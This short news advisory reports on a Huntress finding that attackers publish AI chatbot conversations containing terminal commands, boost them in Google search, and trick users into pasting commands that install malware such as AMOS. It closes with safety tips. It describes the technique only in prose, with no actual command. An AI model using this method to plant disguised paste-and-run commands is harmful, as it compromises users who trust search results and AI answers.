Today, AI tools like ChatGPT, Grok and Gemini have become a part of our everyday life. People use them to get answers to questions, solve technical problems and make work easier. But now cyber criminals have also started misusing these AI tools. A recent report by Huntress shows how seemingly simple AI answers can trap people into malware.
This type of attack is done very cleverly. First of all, the hacker gets a command generated from an AI tool for a common task. AI gives a terminal command which looks quite normal. After this, the hacker makes that AI conversation public and promotes it in such a way that it starts appearing at the top of Google search. When a user searches the same question on Google, he sees the same AI answer.
The trouble starts when the user directly copy-pastes the command into the terminal of his system without understanding it. In many cases, this command silently runs code that gives the hacker access to the system.
Similarly, malware named AMOS was spread. The special thing is that in this neither any file has to be downloaded nor any suspicious link has to be clicked, just one mistake of yours is enough.
This method is more dangerous because it takes advantage of our habits and trust. People trust Google and AI tools and have seen tech experts sharing such commands before. In such a situation, copying one line of code seems completely normal, but that same line can cause harm.
How to stay safe?
The most important thing to keep yourself safe is to never run any command without understanding it. If you don’t know what a command does, don’t run it. Check it first, if necessary, test it in a safe environment.
Always get information from official websites, company documents or trusted guides. Apart from this, avoid running commands in admin or root access and keep your system updated. If there is even the slightest doubt, it is better to ask an expert rather than taking risks.





























